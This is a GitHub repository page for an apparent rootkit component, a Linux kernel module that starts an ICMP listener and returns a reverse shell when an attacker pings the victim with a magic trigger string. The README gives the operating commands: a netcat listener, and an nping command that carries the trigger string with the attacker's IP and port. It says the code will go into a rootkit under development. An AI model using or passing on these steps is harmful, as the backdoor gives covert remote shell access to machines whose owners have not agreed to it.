Skip to content

xiaoheiccc/reverse-shell-access-kernel-module

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Kernel module invoked reverse shell

When this kernel module is installed it invokes an icmp listener script, this script sends a reverse shell in response to an attacker ping.

Using nc -l [PORT] and then in a separate window running nping --icmp -c 1 -dest-ip [victim ip] --data-string 'maK_it_$H3LL [attacker ip] [PORT]' we can ping the victim machine and send ourselves back a reverse shell. Make sure to have a netcat listener waiting on the port you specify before pinging.

This demonstrates how a user-land script/app can be invoked from the kernel

This functionality will be added as part of the final rootkit that is being developed as part of this project http://r00tkit.me/

About

This is a kernel module invoked reverse shell proof of concept.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C 78.5%
  • Shell 13.1%
  • Makefile 8.4%